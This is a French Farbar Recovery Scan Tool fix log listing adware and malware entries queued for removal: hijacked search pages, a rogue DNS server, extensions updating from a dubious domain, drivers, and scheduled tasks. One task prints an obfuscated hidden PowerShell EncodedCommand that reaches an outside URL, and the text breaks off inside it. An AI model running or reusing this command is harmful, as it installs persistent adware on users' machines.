Résultats de correction de Farbar Recovery Scan Tool (x64) Version:20-02-2016
Exécuté par S (2016-02-21 09:54:19) Run:1
Exécuté depuis C:\Users\S\Desktop
Profils chargés: S (Profils disponibles: S)
Mode d'amorçage: Safe Mode (with Networking)
==============================================

fixlist contenu:
*****************
start

CreateRestorePoint:

CloseProcesses:

HKLM-x32\...\Run: [mbot_fr_163] => [X]

HKLM-x32\...\Run: [oasi_en_062020224] => [X]

HKLM-x32\...\Run: [rec_en_77] => [X]

HKLM-x32\...\Run: [sun3] => [X]

AppInit_DLLs-x32: C:\ProgramData\caMyciloP\Lotlamfresh.dll => C:\ProgramData\caMyciloP\Lotlamfresh.dll [257536 2016-01-31] ()

ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => Pas de fichier

GroupPolicy: Restriction - Chrome

CHR HKLM\SOFTWARE\Policies\Google: Restriction

Tcpip\..\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}: [NameServer] 104.197.191.4

HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.sweet-page.com/web/?type=ds&ts=1431619519&z=bfa0ba17bd353e95ee9801dgez4c8g8q8gct8wce2t&from=corfr&uid=CrucialXCT120M500SSD1_13140933434E0933434E&q={searchTerms}

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.sweet-page.com/web/?type=ds&ts=1431619519&z=bfa0ba17bd353e95ee9801dgez4c8g8q8gct8wce2t&from=corfr&uid=CrucialXCT120M500SSD1_13140933434E0933434E&q={searchTerms}

HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.sweet-page.com/web/?type=ds&ts=1431619519&z=bfa0ba17bd353e95ee9801dgez4c8g8q8gct8wce2t&from=corfr&uid=CrucialXCT120M500SSD1_13140933434E0933434E&q={searchTerms}

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.sweet-page.com/web/?type=ds&ts=1431619519&z=bfa0ba17bd353e95ee9801dgez4c8g8q8gct8wce2t&from=corfr&uid=CrucialXCT120M500SSD1_13140933434E0933434E&q={searchTerms}

HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRYEqQao2TxTGptbOxpBNbMQc-Bz0zMmgmr5inyhA7tzxvYkPkhhKDzNlS6I2DRv6Ehlz85-4kKiSDkuBdELXYSvu2Ob1asQZyAmgMsszc444D9cer9NzESw2KUlysHe_ymJRffzpK3fNYD38kbzPtuVuaPO8ncGIUSCfE1UDgn9RqRpNLBahUBwCl3KmP5U,&q={searchTerms}

SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =

SearchScopes: HKLM-x32 -> ielnksrch URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRYEqQao2TxTGptbOxpBNbMQc-Bz0zMmgmr5inyhA7tzxvYkPkhhKDzNlS6I2DRv6Ehlz85-4kKiSDkuBdELXYSvu2Ob1asQZyAmgMsszc444D9cer9NzESw2KUlysHe_ymJRffzpK3fNYD38kbzPtuVuaPO8ncGIUSCfE1UDgn9RqRpNLBahUBwCl3KmP5U,&q={searchTerms}

BHO-x32: Pas de nom -> {02478D38-C3F9-4efb-9B51-7695ECA05670} -> Pas de fichier

FF NewTab: C:\\ProgramData\\caMyciloPs\\ff.NT

FF DefaultSearchEngine: findit

FF Homepage: C:\\ProgramData\\caMyciloPs\\ff.HP

FF user.js: detected! => C:\Users\S\AppData\Roaming\Mozilla\Firefox\Profiles\prrb21uk.default\user.js [2016-01-31]

FF SearchPlugin: C:\Users\S\AppData\Roaming\Mozilla\Firefox\Profiles\prrb21uk.default\searchplugins\bing-lavasoft.xml [2016-01-31]

FF SearchPlugin: C:\Users\S\AppData\Roaming\Mozilla\Firefox\Profiles\prrb21uk.default\searchplugins\bingcom.xml [2016-01-31]

FF SearchPlugin: C:\Users\S\AppData\Roaming\Mozilla\Firefox\Profiles\prrb21uk.default\searchplugins\findit.xml [2016-01-31]

FF Extension: duplicatethistabmozillaorg - C:\Users\S\AppData\Roaming\Mozilla\Firefox\Profiles\prrb21uk.default\Extensions\duplicate-this-tab@mozilla.org [2014-10-17] [non signé]

FF Extension: Browsers+Apps+1.1 - C:\Users\S\AppData\Roaming\Mozilla\Firefox\Profiles\prrb21uk.default\Extensions\wrigtdamon@yahoo.com [2014-10-14] [non signé]

FF HKLM\...\Firefox\Extensions: [{552214C7-0E89-4D62-99BF-692DF251F6CE}] - C:\Program Files\shopperz310120161627\Firefox\{552214C7-0E89-4D62-99BF-692DF251F6CE}.xpi => non trouvé(e)

FF HKLM\...\Firefox\Extensions: [{794D2E20-F319-4F6D-83F3-7A6899A0A3EE}] - C:\Program Files\shopperz310120161636\Firefox\{794D2E20-F319-4F6D-83F3-7A6899A0A3EE}.xpi => non trouvé(e)

FF HKLM\...\Firefox\Extensions: [{23BB450D-DE1A-48A0-b2F1-BF297E6FFEE9}] - C:\Program Files\shopperz310120161915\Firefox\{23BB450D-DE1A-48A0-b2F1-BF297E6FFEE9}.xpi => non trouvé(e)

FF HKLM-x32\...\Firefox\Extensions: [{552214C7-0E89-4D62-99BF-692DF251F6CE}] - C:\Program Files\shopperz310120161627\Firefox\{552214C7-0E89-4D62-99BF-692DF251F6CE}.xpi => non trouvé(e)

FF HKLM-x32\...\Firefox\Extensions: [{794D2E20-F319-4F6D-83F3-7A6899A0A3EE}] - C:\Program Files\shopperz310120161636\Firefox\{794D2E20-F319-4F6D-83F3-7A6899A0A3EE}.xpi => non trouvé(e)

FF HKLM-x32\...\Firefox\Extensions: [{23BB450D-DE1A-48A0-b2F1-BF297E6FFEE9}] - C:\Program Files\shopperz310120161915\Firefox\{23BB450D-DE1A-48A0-b2F1-BF297E6FFEE9}.xpi => non trouvé(e)

CHR Extension: (Google Slides) - C:\Users\S\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-10] [UpdateUrl: hxxps://epicunitscan.info/00service/update2/crx]

CHR Extension: (Google Docs) - C:\Users\S\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-10] [UpdateUrl: hxxps://epicunitscan.info/00service/update2/crx]

CHR Extension: (Google Drive) - C:\Users\S\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-02-10] [UpdateUrl: hxxps://epicunitscan.info/00service/update2/crx]

CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\S\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2015-02-11] [UpdateUrl: hxxps://epicunitscan.info/00service/update2/crx]

CHR Extension: (Web Browser Switcher for Chrome) - C:\Users\S\AppData\Local\Google\Chrome\User Data\Default\Extensions\dfjohdhhdfnbnleaagegogfdfgkbfgcg [2015-03-02] [UpdateUrl: hxxps://epicunitscan.info/00service/update2/crx]

CHR Extension: (Google Sheets) - C:\Users\S\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-10] [UpdateUrl: hxxps://epicunitscan.info/00service/update2/crx]

CHR Extension: (Google Wallet) - C:\Users\S\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-02-10] [UpdateUrl: hxxps://epicunitscan.info/00service/update2/crx]

CHR HKLM\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx

CHR HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [jlcgehabolcakkjhgmgpkagpolbjlhfa] - hxxps://clients2.google.com/service/update2/crx

CHR HKLM-x32\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx

S2 pKmAVFr; C:\ProgramData\QpHsgPX\pKmAVFr.exe [3002352 2016-01-31] (Rational Thought Solutions)

S2 WajaNetEn Monitor; C:\Program Files\WajaNetEn\b6ace0ad34426af9bfa677bd74982d41.exe [3068928 2016-01-20] () [Fichier non signé]

R1 cherimoya; C:\Windows\System32\drivers\cherimoya.sys [61336 2016-01-31] (Cherimoya Ltd)

R1 {28732d35-3deb-4a02-82b2-301e83b4aecb}Gw64; C:\Windows\System32\drivers\{28732d35-3deb-4a02-82b2-301e83b4aecb}Gw64.sys [48744 2016-01-31] (StdLib)

S3 SMUpdd; \??\C:\Program Files\Common Files\Goobzo\GBUpdate\smw.sys [X]

S1 tbfd_1_10_0_16; system32\drivers\tbfd_1_10_0_16.sys [X]

2016-02-12 18:41 - 2016-02-01 08:34 - 00260919 ____N (zcengine) C:\Windows\SysWOW64\trz6EE9.tmp

2016-02-02 16:32 - 2016-02-01 08:34 - 00308935 ____N (zcengine) C:\Windows\system32\trz3C0.tmp

2016-02-02 16:18 - 2016-02-02 16:18 - 00000000 ____D C:\Program Files\Common Files\AV

2016-02-02 16:17 - 2016-02-17 11:11 - 00000000 ____D C:\ProgramData\AVAST Software

2016-02-02 13:28 - 2016-02-02 13:28 - 00022504 _____ C:\Windows\System32\Tasks\{7F7E7A47-0B0C-0F08-0A11-790D7F0A1178}

2016-02-02 13:28 - 2016-02-02 13:28 - 00000000 ____D C:\ProgramData\8b3e0aeb-25d7-1

2016-02-02 13:28 - 2016-02-02 13:28 - 00000000 ____D C:\ProgramData\8b3e0aeb-00e7-0

2016-02-01 08:44 - 2016-02-01 08:44 - 00000000 ____D C:\ZombieNews

2016-02-01 08:44 - 2016-02-01 08:44 - 00000000 ____D C:\Users\S\AppData\Local\HealthAlert

2016-02-01 08:39 - 2016-02-13 19:17 - 00000000 ____D C:\ProgramData\Browser

2016-02-01 08:35 - 2016-02-01 08:47 - 00009656 _____ C:\Windows\SysWOW64\zcengineOff.ini

2016-02-01 08:35 - 2016-02-01 08:47 - 00009656 _____ C:\Windows\system32\zcengineOff.ini

2016-01-31 20:00 - 2016-01-31 20:00 - 00003106 _____ C:\Windows\System32\Tasks\{1F4A89EC-573E-4BEA-8104-7FC6597AC0DB}

2016-01-31 19:58 - 2016-01-31 19:58 - 00000000 ____D C:\Program Files (x86)\Exploremedia

2016-01-31 19:57 - 2016-02-15 22:28 - 00000000 ____D C:\ProgramData\caMyciloP

2016-01-31 19:57 - 2016-01-31 19:57 - 00000000 ____D C:\ProgramData\caMyciloPs

2016-01-31 19:51 - 2016-01-31 19:57 - 00000000 ____D C:\Users\S\AppData\Roaming\systweak

2016-01-31 19:51 - 2015-11-20 19:27 - 00019888 _____ () C:\Windows\system32\roboot64.exe

2016-01-31 19:50 - 2016-01-31 19:58 - 00000000 ____D C:\Users\S\AppData\Roaming\Opera Software

2016-01-31 19:50 - 2016-01-31 19:58 - 00000000 ____D C:\Users\S\AppData\Local\Opera Software

2016-01-31 19:50 - 2016-01-31 19:58 - 00000000 ____D C:\Program Files (x86)\Opera

2016-01-31 19:50 - 2016-01-31 19:50 - 00000000 ____D C:\ProgramData\QpHsgPX

2016-01-31 19:49 - 2016-01-31 19:49 - 00000000 ____D C:\ProgramData\PlayGemConfig

2016-01-31 19:48 - 2016-02-03 18:34 - 00000000 ____D C:\Program Files (x86)\QuickSearch

2016-01-31 19:42 - 2016-01-31 19:42 - 00000000 ____D C:\Users\S\AppData\Local\ZombieNews

2016-01-31 18:30 - 2016-01-31 18:30 - 00425744 _____ (Lavasoft Limited) C:\Windows\system32\LavasoftTcpService64.dll

2016-01-31 18:30 - 2016-01-31 18:30 - 00345360 _____ (Lavasoft Limited) C:\Windows\SysWOW64\LavasoftTcpService.dll

2016-01-31 18:30 - 2016-01-31 18:30 - 00002768 _____ C:\Windows\SysWOW64\LavasoftTcpServiceOff.ini

2016-01-31 18:30 - 2016-01-31 18:30 - 00002768 _____ C:\Windows\system32\LavasoftTcpServiceOff.ini

2016-01-31 18:30 - 2016-01-31 18:30 - 00000250 _____ C:\Prefs.js

2016-01-31 18:30 - 2016-01-31 18:30 - 00000000 ____D C:\searchplugins

2016-01-31 18:24 - 2016-02-01 08:36 - 00000002 _____ C:\END

2016-01-31 18:18 - 2016-01-31 19:54 - 00061336 _____ (Cherimoya Ltd) C:\Windows\system32\Drivers\cherimoya.sys

2016-01-31 18:15 - 2016-01-31 18:16 - 00000000 ____D C:\Program Files\WajaNetEn

2016-01-31 17:46 - 2016-02-02 22:00 - 00000000 ____D C:\Users\S\AppData\Roaming\TutofQesgifo

2016-01-31 17:46 - 2016-01-31 17:47 - 00000000 ____D C:\Users\S\AppData\Local\Tempfolder

2016-01-31 17:46 - 2016-01-31 17:46 - 00003330 _____ C:\Windows\System32\Tasks\Thufihaz

2016-01-31 17:46 - 2016-01-31 17:46 - 00000000 ____D C:\Windows\system32\enet

2016-01-31 17:21 - 2016-01-31 17:21 - 00000000 ____D C:\ProgramData\Rlusuafoosha

2016-01-31 17:17 - 2016-02-02 22:00 - 00000000 ____D C:\Program Files (x86)\5CAFBB60-1454257034-11DD-BEB1-BCEE7B86F8D3

2016-01-31 17:12 - 2016-01-31 07:38 - 00048744 _____ (StdLib) C:\Windows\system32\Drivers\{28732d35-3deb-4a02-82b2-301e83b4aecb}Gw64.sys

2016-01-31 17:10 - 2016-01-31 19:58 - 00001445 _____ C:\Users\S\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk

2016-01-31 17:08 - 2016-01-31 17:08 - 00003184 _____ C:\Windows\System32\Tasks\{C8C5A7B0-140E-4DB7-AE8F-8DAA32E87B74}

2016-01-31 16:59 - 2016-02-02 22:00 - 00000000 ____D C:\Program Files\shopperz310120161627

2016-01-31 16:59 - 2016-01-31 17:06 - 00000000 ____D C:\Users\S\AppData\Local\SearchModule

2016-01-31 16:59 - 2016-01-31 16:59 - 00023208 _____ (Corporation) C:\Windows\system32\Drivers\sdfhgdf.sys

2016-01-31 16:59 - 2016-01-31 16:59 - 00003438 _____ C:\Windows\System32\Tasks\SMWUpd

2016-01-31 16:59 - 2016-01-31 16:59 - 00003332 _____ C:\Windows\System32\Tasks\Tofze

2016-01-31 16:59 - 2016-01-31 16:59 - 00000000 ____D C:\Users\S\AppData\LocalLow\Company

2016-01-31 16:59 - 2016-01-31 16:59 - 00000000 ____D C:\Users\S\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}

2016-01-31 16:59 - 2016-01-31 16:59 - 00000000 ____D C:\uninst

2016-01-31 16:59 - 2016-01-31 16:59 - 00000000 ____D C:\ProgramData\SearchModule

2016-01-31 16:58 - 2016-02-02 22:00 - 00000000 ____D C:\Users\S\AppData\Local\5CAFBB60-1454259509-11DD-BEB1-BCEE7B86F8D3

2016-01-31 16:57 - 2016-02-12 18:43 - 00000000 ____D C:\Program Files (x86)\5CAFBB60-1454255842-11DD-BEB1-BCEE7B86F8D3

2016-01-31 16:57 - 2016-01-31 18:32 - 00000000 ____D C:\Users\S\AppData\Roaming\WTools

2016-01-31 16:57 - 2016-01-31 18:32 - 00000000 ____D C:\Users\S\AppData\Roaming\Store

2016-01-31 16:57 - 2016-01-31 16:56 - 00001110 _____ C:\Windows\system32\Drivers\etc\hp.bak

2016-01-31 16:56 - 2016-02-02 22:00 - 00000000 ____D C:\ProgramData\aGKpCJK

2016-01-31 16:56 - 2016-02-02 16:20 - 00000000 ____D C:\ProgramData\ApplicationHosting

2016-01-31 16:56 - 2016-02-02 16:20 - 00000000 ____D C:\Program Files\BitTorrent

2016-01-31 16:56 - 2016-01-31 20:06 - 00000000 ____D C:\ProgramData\Boxore

2016-01-31 16:56 - 2016-01-31 19:58 - 00010088 _____ C:\Windows\SysWOW64\BoxoreServiceOff.ini

2016-01-31 16:56 - 2016-01-31 19:58 - 00010088 _____ C:\Windows\system32\BoxoreServiceOff.ini

2016-01-31 16:56 - 2016-01-31 19:57 - 00002397 _____ C:\Windows\SysWOW64\findit.xml

2016-01-31 16:56 - 2016-01-31 18:31 - 00000000 ____D C:\Users\S\AppData\Roaming\Nosibay

2016-01-31 16:56 - 2016-01-31 16:58 - 00000000 ____D C:\Users\S\AppData\Local\Boxore

2016-01-31 16:56 - 2016-01-31 16:56 - 00041472 _____ C:\Users\S\AppData\Local\Villalab.dat

2016-01-31 16:56 - 2016-01-31 16:56 - 00000187 _____ C:\Users\S\AppData\Local\Villalab.exe.config

2016-01-31 16:56 - 2016-01-31 16:56 - 00000000 ____D C:\ProgramData\Medlights

2016-01-31 16:56 - 2016-01-19 03:22 - 00303984 _____ (Boxore OU) C:\Windows\SysWOW64\BoxoreService.dll

2016-01-31 16:55 - 2016-02-18 11:25 - 00000000 ____D C:\Program Files\Sound+

2016-01-31 16:56 - 2016-01-31 16:57 - 0001263 _____ () C:\Users\S\AppData\Roaming\Bubble Dock.boostrap.log

2016-01-31 16:56 - 2016-01-31 16:57 - 0005688 _____ () C:\Users\S\AppData\Roaming\Bubble Dock.installation.log

2016-01-31 16:57 - 2016-01-31 16:57 - 0000078 _____ () C:\Users\S\AppData\Roaming\Selection Tools.installation.log

2016-01-31 16:56 - 2016-01-31 16:56 - 0000097 _____ () C:\Users\S\AppData\Roaming\WindApp.boostrap.log

2016-01-31 16:57 - 2016-01-31 16:57 - 0000078 _____ () C:\Users\S\AppData\Roaming\WindApp.installation.log

C:\Program Files\Common Files\Goobzo

C:\Program Files\shopperz310120161636

C:\Program Files\shopperz310120161915

C:\Users\S\AppData\Roaming\mystartsearch

C:\Users\S\AppData\Roaming\omiga-plus

Task: {038ECAE5-4F59-4163-B023-594620E942DF} - System32\Tasks\Tofze => C:\PROGRA~1\SHOPPE~1\Degmueq.bat

Task: {0EEA080F-5E45-41D8-B3D3-AFF16F13795F} - System32\Tasks\{7F7E7A47-0B0C-0F08-0A11-790D7F0A1178} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAbwBmAHQAcABpAGMAawBzAG0AYQByAHQALgBjAG8AbQAvAHUALwA/AGEAPQBlAHgAcQBMAC0ARABFAFUAdABGAHYASABNAFEAYwAyAGQAZAB1AC0ASgB2AGIAQQBUAE8ATgBaAF8AagBfAFMARABDADUAWgA5AFMAdwAzAEEAQgBIAFQANABRADcASwBGAE4ANABJAGMAWAA0AFcAawAzAHoATABtAGcAcwBEAFQAQgBEAFkAQQB6AC0AdwBXAFgAeABFADIAeQAzAHIAdwBpADgAUABMADMARwAwADQASQBhAHoANAAyAHgARQBaAEkAVgBxAEYARwBOADIAcQB2AF8AbwBSADUAUwBEAFEAWABGAEQAdQB2AGkAOABwAE0AYgBhAGwAdwAyAEgAYwBaAEYAYgBfAFUASABxAGwAVABGAGsATwB3AG0AQQBJAF8AZwBuAGsAbABwAFoAQgBIAGwASABfAGQAdABSAGcANwBzAEQAUQBZAGEAbQBiAEcAcQBsAGEANQBFAEUAYwBZAG4AeABGAE4AcQA4AE0AYgBHADgATABoADAAZABmADUAMgBPAF8ARQBCADgATQBtADUAVwBIAEkAYQAxAHgAagBjAFoAbgBkAG0AZAB2AHUAZwBzAGEASQBPADIAbQBmAHUAeQBtAEEAdQBYAC0AbQB3ADgANwBRAC0AUwByAFcAMwAyAHAAVwBBAEcARgBiAGwAWgBtAE4ASQB1AFYANwBUAFQAdABOAEsASwBaAGIATgBvAGgAbwBOAFIAQwBGAEYAMgBEAEEANgA5AHcAVgBOAFEAYQBZAHcAXwBjAHQANABqAGsAVQBiAGwAcgBSAHEATgBOAGMAZgBmAEgASwAtAHcAZABpAFAAXwBmAHAAbAB5AGcAZwB1AEsAVQBkAHgAaAAzADcAYwBaADcAVQBPAEsAWgAtAGoAZgBkAFkAeAB1ADkAbgAzAHkAZABtAHIAcgBlAFoANQAzADEASABKAG4AagBFAHoASwBzAEUAZABCAFEAVgA2AE0AZQAxAEMAYwBZAHIAdwB1AGUAMAA2AG4AZgBMAEcATgBFAFoAMQByAFkAMABrAEoASgBBAEEAcwBaAE8AMgBpAGgARwB4AGYAUQAyAEkAUABNAE8AcwBDAEIAZABhAEwAYwBjAEEAcgBQAHkAWQBoAFcARQBZAEIAbABuAEIAQgBRAC0ANgB3ADMAcwBZAHkAUQA1AEwAUAB0ADYANABQAG0ARQBjAEQAVwB5AGkANgBXAGoARABMAGkAagB5AE8AZgBGAEcAWgBzAGsAXwB5AFgAOQByAHYAZwBsAF8AQgBQAHMAWABtAEEAOABhADYAOQBoAGsAeABzAGUAcwBvADMAegA5ADMAQgBKAHMAZAByAHAAegBHADUASwBIAHoARABpAGQAWQBUAFYAWgBNAHUAeABlAGgAMgAwADQAdABYAHcAbABPAEEARQBNAEgAYwBSADAAeAA0AC0ATgB2AHQARwBRAE0AcABwADkAbQBXAGQAdABOAHkAagBoAGcAVgBkAGEARgBUAGUAdQAzAEcAbQB4AGoAegA4AF8AYgBOADcAQwBOAEUALQBfAFIAQwBwAEYAOQAzAFIANwBBAFYAOQB6AEkAMQBoAFQAagBpAEUASABpAFcAeABNAEIAMgBxADUANwB4AFkAWgBMAHgASwBqAGsAUAB1AHcAbwBYAF8AQwAxADgANABVAEQAdAB0ADYAYgBnAHkAegBZAGUAUgBBADAAWABoAGUAUABjAFgAdwBjAFkAQQBxAHkAbgBxAGYAcwBmAC0ANQBmAFcAWAB6AHAAVQA5AFcANQBLADEALQAtAEUALQBrAFkAYwBhAFYAbwBzAEQAQwBiAFoAcQBrAFYAWAAtAHoAeQBkAHYAagA0AFYAdgAwAEkARQBaADAAOQA1AEQAUQBXAHkATgBaAFIAQgBrAGMANQBJAEoAagA0AGcARwBWAEoAaABrAHEAcgBjAEEAcABvAEMAYwBOAG0AcAB5AEIAcgBVADgAMABuAHIAdQA1AHkAZwBXAFgAMQBqAEIARQBDAE8AcgB6AGgAUwBMAGEAMwBTAHcAagB4ADgAQgBuAGoAWQBGAEIAagBBAEMANQBuAEUAZgBIAEoAWAA3AGwAYQBCAFEAZgA4AE4AQgBPAFoAdQBrAGsAQQBKAHAAegBjAEsAWABuAEoALQBBAGcAZgBIAHoAQgBDAGkAVgBxADkASQBwAEUARwBvAGoAQwAmAGMAPQBnAGgANwBTAE0ASQB3AEkATABlADIAbQBnAE4AZAA0AFgAMwBEAFQAMQBSAEMAYQBpAG8ATQBIAEsARwBXADgATQBVADAARgBhAGMATgBRAE4AMgB2AGUAYQBmAGwATAB2AHoAMgA2AFcAUQB2ADMAVgAwAHkAMQBfAEsAWgA2AC0ASABXAEEAMgBFAG4ANABxAFMATABjAFIAegAwAGIATAAyAFYAdwA0ADAAcQBFAFoAawBxAFIAOQBOAEkAbQA1AHcAOQBlAGsARQBtAHMAeQBMAEMAcQBLAE8AdAB2AFoAdQB4AGwAMABEAEQAWQBYAHMAegBTAFYAYQBjAHoAQgA4AGUAWgBmAF8AVgBLAC0AawBDAEQAZQB0ADIAWgBKAGwATABvADgANAA5AGsAcQBSAHMAVwB1AGkAcABJAHQAWgBKAEoAcQBnADAAdwBrAEoAcAB5ADEAbABvAG8AMwA2ADcAXwBoAFYAdABKAFcAZQBPAE0AbAB3AG0AQQBhAHYAdQBvADYARQBwAFMAawBZAHkAcgBOAEcASQBiAG4ARABGAFIANQBHAEQAdAB5ADQAUgB0AE8AUgBVADIAOABEAEoAbABLADAATwByAHEAZgBfAHMAMwBuAHIATQBXAFIANwBZAEMAdwBGAEIAbAA1AE0AXwAwAHgANABnAEsATwBPAEUAUQBaAEgAMABRADgARQBhAFQAbQBtADMAWgBvAHIAUgBQAGcAYwBWAGQAVgBOAEwASwBsAGoANQA4AEoAUQBHADYAcQBVAEwAeAB1AHkASABUAFcAVABoAE0ASwBrAGgAUABfADcAbABxAFQAVgBuAFMAaQA4ADIANABhAEoAZABtAFYAUQBsAEwARgA2AEIAYwBGAGkARgBwAGkANgB5AGsAbQBtAGgARgBTAGMASQByAGYAVgBnAHMATgA0AFkAOQBkAFUAZABtAFAAZgB5AHkAVAA3AG4AOQAxADYAVwBLADAAWQA0ADEAZwBtAEgASQBLAFUAeABOADEAVgBkAEQAQwBaAHQAeQBzAHMAQwA2AGEARwBMAFkAbABBAGYAUgBJAG8AXwBIAEIAMwBqAFgANAB6AGcAbwBjAGEAVwBkAGkAMwBwAFMAOAAtAFEAWgBKADQAdwBuAGcAWQAwADkAbQBMAGwAOQA0AEsAZABxAGQAZABEAFUAdQBXAHYAUgBOAEIAVgB3AGUAXwBHAFEAcABGAEoALQB4AFUAMgB3AFgAMABkAEIAQgBUAEoANAB5AFEANQB2AFAAdABRAGsAWQBGAGkARAB4AGoAVgA0AFAAVgB4AGUAUABRAGoAVwA1AFQAbwBzAG4AZwBJADEAVgBuAHkAaAA3AFoAdAAtAFYAawBKAHgAZQAzADQAbQBLAGQAdABtADgARQAtAFgAVgBOADkAVwBOAE4AdgA5AGoAQgBTAEMAbgBjAHIASQBnAHIAYwB0AFgAawBCAHIAcwBIAFkAbgBaAFIAZQA3AGYAUgAxAEIAVwBtAGYAdQBvAGIALQBqAHgAbwBCAG0AcABRAEYATgBGAFMAcgBaAFQAUQBhAHgAUABMAGQAMAAwAC0ANABqAHgAcwBDAGQAeQBkADQAcwBxAEEAagBwADYAMgBMAFMAawBIAEEARABDAHQASgB2AFkAXwBZADgASABNAFkAeABDAGQAawBJAGEAVwA0AEsAMgB4AFYAOQB5AHYAbgBUADkATgBOADIAagBYAGkAawAxAEkAbABJAFUAdQBEAE4ANwBNAG4AYQBpADkAUQAtAFMARgBCAC0AcwAtAEcAYgB0AGUASwAwAHoARQBuADQAZAA4AEkAegBnAFAAdgBzAG4AMwA4AHgAagBhAHQAYwBtAHYAegB4AE8ARAAyAEoAYwBrADYAYwA0AEwAYQAwAHcAbgA1AG8AcgB3AG8AcwBkAFIAawBQAHIARwBNAEwANQA4ADQAQwB2AG8AcAB6ADAAcQBIAHMAcQBSAHMAYgBSAFcAaQBzAEMAZwB1AEIAYgBJAHoAVAA5AG8AdgBSAEEAWgBGAGoAZwBfAFIANAAxAHEAQQBUAHYAVgBuADAAVQBxAHAAUwBfAGQAOAA1AHoAdgBHAGcAeQByAHUAZABiAFIAbQBIAGIAegBKAHoAaQBfAHcARgBTAFUAMgBmAEIAcgB0AHYAVQB2ADIAcgBwAHYAdQBRAGoASwB3AEkAbQBmAEoAbQA2AF8AWABmAEwAUQBlAFoAcABYAEgARABCAC0AOQB3AGQAYwA0AGoAMwBtADAAYwAtAEcAVABxAHEAdQBBAGkAYgAwAG8ANQBHAEsAbwBkAFcANgAmAHIAPQAxADYAMQAwADIANgAzADMAOQAwADAANgAzADYAMgAyADkANwAyACIAOwAkAHMAdABzAGsAPQAiAHsANwBGADcA